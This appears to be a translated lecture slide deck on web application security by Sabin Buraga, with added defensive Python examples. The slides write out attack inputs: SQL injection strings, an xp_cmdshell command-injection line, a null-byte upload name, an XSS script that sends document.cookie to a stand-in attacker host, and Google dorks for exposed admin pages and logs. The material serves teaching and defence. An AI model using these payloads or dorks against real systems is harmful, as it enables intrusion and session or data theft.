![Page 1: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/1.jpg)
Web application vulnerabilities
Dr. Sabin Buraga
www.purl.org/net/busaco
@busaco

“What one sees on an object is another, hidden object.”
René Magritte

what does data security mean?

security is the process of maintaining an acceptable level of perceived risk

security is a process, not an end state
Mitch Kabay

data security
confidentiality
authentication
authorization
integrity
non-repudiation
privacy
availability

confidentiality
a third party cannot gain access to the data exchanged between two communicating parties

authentication
verifying the user's identity
usually, based on name + password

authorization
specifies the actions (roles) that a user can perform in a given context
tied to authentication

integrity
detecting attempts at unauthorized modification of the transmitted data

non-repudiation
ensures that the sender of a message cannot claim not to have sent it

availability
a given resource must be accessible when it is needed

privacy
concerns the rights that must be respected regarding the nature (subject) of the data being exchanged
often confused with confidentiality

web security must take into account
the client
interaction with the user
personal data stored locally: cookies, offline data, cache, etc.
asynchronous transfers via Ajax/Comet
the presence of suspicious plug-ins and/or extensions
…

web security must take into account
the data in transit
network security
secure exchange of messages between the various entities
non-repudiation of the data
…

web security must take into account
the server
security of the web server(s)
security of the applications
availability of the services

web security must take into account
the client, the data in transit, the server
attacks may target any of these 3 aspects!

vulnerabilities
weaknesses of a hardware/software system that allow unauthorized users to gain access to it
they may also arise from poor administration

no system is 100% secure

modus operandi
1. examining the environment
identifying the public services
discovering the types + versions of the applications
triggering errors & examining the messages obtained
finding sensitive information: source code, comments,
hidden form fields, …

modus operandi
2. choosing the target of the attack
the authentication (login) mechanism
the input fields of the web forms
session management
the infrastructure in use: data storage servers,
additional services – e.g., proxy, …

what are the most common types of attacks?

at the HTTP level
packet analysis (network sniffing)
works on unencrypted HTTP data streams

Wireshark – inspecting the data transmitted over the network

at the HTTP level
packet analysis (network sniffing)
prevention: HTTPS
using HTTP over (W)TLS – (Wireless) Transport Layer Security

at the HTTP level
session hijacking
the attacker determines the user's SID and uses it for their own purposes

at the HTTP level
session hijacking
inspecting the Referer field of an HTTP request message
Referer: https://www.ebank.info/view/account?id=98755&jsessid=BAC13606AC22B81E5137F45F95EE7573

at the HTTP level
session hijacking
prevention:
removing the SID from the URL
storing the SID in the User-Agent field
using a variable SID
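The mitigations above in runnable form, as an added example that is not code from the deck: a server-side session store that hands the SID to the browser only as a cookie, replaces it at login (the "always generate a new session ID once the user logs in" rule later in the deck), and a helper that flags a URL carrying a live SID in its query string, the shape of the jsessid Referer above. The class and function names, the cookie attributes and the sample URL are my assumptions.

```python
import secrets
from urllib.parse import parse_qs, urlsplit


class SessionStore:
    """Server-side sessions keyed by an unguessable ID. The ID reaches the
    browser only as a cookie (never in a URL, so it cannot end up in a
    Referer header) and is replaced as soon as the user logs in."""

    def __init__(self):
        self._sessions = {}  # sid -> session data

    def create(self):
        sid = secrets.token_urlsafe(32)  # 256 random bits, URL-safe alphabet
        self._sessions[sid] = {"user": None}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

    def login(self, sid, user):
        """Authenticate the session and issue a fresh SID; the pre-login SID
        stops working, so a fixed or sniffed value is useless afterwards."""
        data = self._sessions.pop(sid, None)
        if data is None:
            raise KeyError("unknown session")
        data["user"] = user
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = data
        return new_sid

    def logout(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid):
    """Set-Cookie value: Secure keeps it off plain HTTP (sniffing), HttpOnly
    keeps it away from page scripts (XSS cookie theft)."""
    return "sid=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % sid


def url_carries_live_sid(url, store):
    """True if any query parameter of url is a currently valid SID, which is
    exactly what a Referer like ...?id=98755&jsessid=... would leak."""
    params = parse_qs(urlsplit(url).query)
    return any(store.get(v) is not None
               for values in params.values() for v in values)


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create()
    authed = store.login(anon, "alice")
    print(session_cookie(authed))
    # Constructed URL in the shape of the deck's Referer example.
    leaky = "https://www.ebank.info/view/account?id=98755&jsessid=" + authed
    print(url_carries_live_sid(leaky, store))  # True
```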

SQL injection
writing SQL queries that display, alter or delete data in databases, via web forms or directly via URLs

SQL injection
select * from customers where name=$name and pass=$pass
$name taken from the form, with the value '' or 1=1 --

SQL injection
http://e-bankk.org/clients.php?client=3
the PHP program contains:
select credit_card from clients where client=$client
what happens if the URI is http://e-bankk.org/clients.php?client=client ?

SQL injection
variation: crafting malformed SQL queries
in order to obtain "interesting" error messages

SQL injection
http://www.phunds.biz/search?id=1+OR+gh=1
the attacker may receive a message such as:
[Microsoft][ODBC SQL Server Driver] [SQL Server] Invalid column name 'gh'.
SELECT group_id, securityName, maxSalesCharge, price, security_id, trade_date FROM funds WHERE group_id = 1 OR gh=1 ORDER BY price DESC

SQL injection
prevention:
neutralizing the SQL meta-characters
prepared statements
using ORM (Object-Relational Mapping) frameworks
resorting to stored procedures
…

SQL injection
incorrect: $sql = "select * from users where user = '" . $user . "'";
correct: $rezultat = db_query ("select * from users where user = ?", $user);
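The incorrect and correct forms above carried through in runnable code, as an added example that is not the deck's PHP: Python's sqlite3 module over a constructed customers table, where the deck's `' or 1=1 --` value bypasses the concatenated query but not the prepared statement, plus a handler that keeps database error details in the application log instead of the response (two more of the deck's rules). Table contents, function names and the HTTP status codes are my assumptions.

```python
import logging
import sqlite3

log = logging.getLogger("ebank")  # application-level log, per the deck's rules


def make_db():
    """Constructed in-memory stand-in for the deck's 'customers' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table customers (name text, pass text)")
    conn.executemany("insert into customers values (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, name, password):
    """Query built by concatenation, like the 'incorrect' PHP line above."""
    sql = ("select * from customers where name='" + name
           + "' and pass='" + password + "'")
    return conn.execute(sql).fetchall()


def login_safe(conn, name, password):
    """Prepared statement: the SQL text is fixed, values are bound separately."""
    sql = "select * from customers where name=? and pass=?"
    return conn.execute(sql, (name, password)).fetchall()


def authenticate(conn, name, password):
    """Request handler: returns (status, text for the client). Database
    error details go to the log only, never into the response."""
    try:
        rows = login_safe(conn, name, password)
    except sqlite3.Error as exc:
        log.error("login query failed for user %r: %s", name, exc)
        return 500, "login temporarily unavailable"
    if rows:
        return 200, "welcome " + rows[0][0]
    return 401, "invalid credentials"


# The deck's bypass value, quoted the way the concatenated query expects.
PAYLOAD = "' or 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, "x"))  # every customer row
    print(login_safe(db, PAYLOAD, "x"))        # []
    print(authenticate(db, PAYLOAD, "x"))      # (401, 'invalid credentials')
```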
![Page 43: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/43.jpg)
SQL injection + command injection
utilizarea SQL pentru executia de comenzila nivel de shell
din cadrul serverului de baze de date
![Page 44: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/44.jpg)
SQL injection + command injection
SELECT * FROM users WHERE name = 'tuxy' ANDpass = ' '; xp_cmdshell 'taskkill /F /IM
sqlservr.exe' --'

poisonous null-byte attack
using the NULL character to place scripts on the server
which can later be executed

poisonous null-byte attack
the attacker uploads an "image" – img.php%00.jpg
"Thank you! See your picture at img.php"
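An upload-name check that closes the hole above, added here as an example and not code from the deck: it percent-decodes the client-supplied name first (so an encoded NUL is seen), rejects control characters, path separators and dotted stems such as img.php, white-lists the extension, confirms it against the file's first bytes and stores the file under a server-generated name. The allowed-extension set, the signature table and the function names are my assumptions.

```python
import os
import re
import secrets
from urllib.parse import unquote

# Assumed policy: an image-upload endpoint that accepts only these types.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
STEM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")
IMAGE_SIGNATURES = (
    (b"\xff\xd8\xff", {".jpg", ".jpeg"}),
    (b"\x89PNG\r\n\x1a\n", {".png"}),
    (b"GIF87a", {".gif"}),
    (b"GIF89a", {".gif"}),
)


def validate_upload_name(raw_name):
    """Return (stem, extension) for an acceptable client-supplied file name,
    or raise ValueError. Decoding happens first, so an encoded NUL is seen."""
    name = unquote(raw_name)  # "img.php%00.jpg" -> "img.php\x00.jpg"
    if any(ord(c) < 32 or ord(c) == 127 for c in name):
        raise ValueError("control character (e.g. NUL) in file name")
    if "/" in name or "\\" in name:
        raise ValueError("path separator in file name")
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed: " + repr(ext))
    # White-list the stem; a dot inside it ("img.php") is rejected outright.
    if not STEM_RE.fullmatch(stem):
        raise ValueError("file name contains characters outside the allowed set")
    return stem, ext


def content_matches_extension(data, ext):
    """True only if the first bytes carry a signature for that extension."""
    for magic, exts in IMAGE_SIGNATURES:
        if data.startswith(magic):
            return ext in exts
    return False


def storage_name(raw_name, data):
    """Name written to disk: server-generated, so no client text reaches the
    filesystem; the extension is the validated one, confirmed by the bytes."""
    _, ext = validate_upload_name(raw_name)
    if not content_matches_extension(data, ext):
        raise ValueError("file content does not match its extension")
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    jpeg_head = b"\xff\xd8\xff\xe0" + b"\x00" * 12  # constructed JPEG header
    print(storage_name("holiday.JPG", jpeg_head))
    for bad in ("img.php%00.jpg", "img.php.jpg", "..%2Fshell.png"):
        try:
            storage_name(bad, jpeg_head)
        except ValueError as exc:
            print(bad, "->", exc)
```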

XSS: cross-site scripting
"injecting" JavaScript code for direct execution in the web browser

XSS: cross-site scripting
see also http://ha.ckers.org/xss.html
for real-world examples, see http://xssed.com/

XSS: cross-site scripting
works mainly on interactive websites:
forums, blogs, wikis, …

XSS: cross-site scripting
can also lead to identity theft (phishing)
or to placing malware on the client: CSRF – Cross-Site Request Forgery
especially in the context of mash-ups

XSS: cross-site scripting
<img src="javascript:cod" />
an attacker can redirect the user to another site, capture cookie values
or lock up the web browser

XSS: cross-site scripting
<script type="text/javascript">document.location.replace (
"http://phurt-uri.org/furt.php" + "?c=" + document.cookie);
</script>
cookie theft (hijacking cookies)
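Neutralising the payloads above on the server side, as an added example that is not the deck's code: the cookie-stealing script and the javascript: image URL from these slides are reused as constructed inputs; user text is entity-encoded before it enters the page (the deck's "filter all data before including them in a web page" rule) and image URLs pass a scheme white-list rather than a black-list of javascript:. Function names and the allowed schemes are my assumptions.

```python
import html
from urllib.parse import urlsplit

# The deck's two payloads, reused here as constructed test inputs.
COOKIE_THIEF = ('<script type="text/javascript">document.location.replace('
                '"http://phurt-uri.org/furt.php" + "?c=" + document.cookie);'
                '</script>')
JS_IMAGE_URL = "javascript:cod"

ALLOWED_SCHEMES = {"http", "https"}  # white-list, not a black-list of javascript:


def render_comment_vulnerable(text):
    """User text pasted straight into the page: the browser runs the script."""
    return "<p>" + text + "</p>"


def render_comment_safe(text):
    """Entity-encode for the HTML text context before the text enters the
    page: < > & " ' become entities, so a script tag is shown, not executed."""
    return "<p>" + html.escape(text, quote=True) + "</p>"


def checked_image_url(url):
    """Return the URL if it is an absolute http(s) URL, otherwise None."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return url


def render_image(url):
    """Emit an <img> only for a white-listed URL, escaped for the attribute."""
    checked = checked_image_url(url)
    if checked is None:
        return ""
    return '<img src="' + html.escape(checked, quote=True) + '" />'


def would_execute_script(markup):
    """Simplified check: does the markup still contain a script start tag
    as the browser would see it?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(would_execute_script(render_comment_vulnerable(COOKIE_THIEF)))  # True
    print(would_execute_script(render_comment_safe(COOKIE_THIEF)))        # False
    print(repr(render_image(JS_IMAGE_URL)))                               # ''
    print(render_image("https://example.org/logo.png"))
```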
![Page 53: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/53.jpg)
clickjacking
folosirea de cod JavaScript pentrua modifica textul redat de navigatorul web
utilizatorului sau pentru a manipulautilizatorul sa viziteze legaturi ascunse
http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html
![Page 54: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/54.jpg)
tabnabbing
recurgerea la cod JavaScript pentru a generaintr-un tab al navigatorului o replica
a unui formular de autentificarela un serviciu notoriu – e.g., Facebook, GMail
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

real-world example
exploiting an XSS vulnerability in MySpace's HTML filter: when a user viewed
Tuxy's profile, the JavaScript code automatically made them Tuxy's friend + used Ajax to insert the malicious script into the current profile
social network worm
after 20 hours, 1,005,831 requests; MySpace "crashed"

real-world example
Google UTF-7 hole: the 404 pages served by Google did not specify
the character encoding used
XSS attacks encoded as UTF-7 could be accessed and executed in Internet Explorer
http://shiflett.org/blog/2005/dec/googles-xss-vulnerability

problems caused by URIs/IRIs
misleading the user
example:
http://[email protected]/

problems caused by URIs/IRIs
faulty handling of hexadecimal (percent-encoded) codes
vulnerabilities in some web servers

problems caused by URIs/IRIs
sites with internationalized domain names (IDN – International Domain Names): homograph attacks
adobe.com ≠ adobe.com

web trojans
seemingly useful websites/web applications, which the user may reach
possibly via automatic redirection

web trojans
extensions or plug-ins that include malicious code

web trojans
additionally, they may resort to XSS/CSRF or to social engineering techniques

detecting possible vulnerabilities – due to incorrect or
default configurations of web servers and/or web applications – can be done using a search engine

detecting software versions with known bugs
"Apache/2.0.52 server at"
access to .bak files
inurl:index.php.bak
detecting administration pages
"admin login "
finding default installations
intitle:"welcome to" intitle:internet IIS

locating the interfaces to database systems
inurl:main.php phpMyAdmin
searching for installed applications or for log files
inurl:error.log +filetype:log -cvs
searching for error messages generated by applications or by database servers
"ASP.NET_SessionId" "data source="

see also the "Google Hack" Honeypot project
http://ghh.sourceforge.net/

the security of a web application
must take into account the architecture,
the logic (functionality), the source code and
the content, as a whole

the security of a web application
does not cover the vulnerabilities of the operating system or of auxiliary programs

typical types of web vulnerabilities
authentication problems
session management
injection of scripts (XSS) or of SQL commands

typical types of web vulnerabilities
(involuntary) exposure of "sensitive" information (information disclosure)
access to the source code or to the configuration files of the web application
incorrect management of the application's configuration

rules/best practices (Sverre Huseby, 2004)
do not underestimate the power of the dark side
use POST requests when actions have side effects
in a server-side context, there is no such thing as client-side security
always generate a new session ID once the user logs in
never pass detailed error messages to the client
identify every possible meta-character to a subsystem
when possible, pass data separate from control information
do not blindly trust the API documentation
identify all sources of input to the application
when filtering data, use white-listing rather than black-listing
create application-level logs
never use client-side scripts for security
pass as little internal state information as possible to the client
don't assume that requests will come in a certain order
filter all data before including them in a web page, no matter what the origin
stick to existing cryptographic algorithms, do not create your own
never store clear-text passwords
assume that server-side code is available to attackers
security is not a product; it is a process

http://planet-websecurity.org/feed/
http://www.owasp.org/
http://simonwillison.net/tags/security/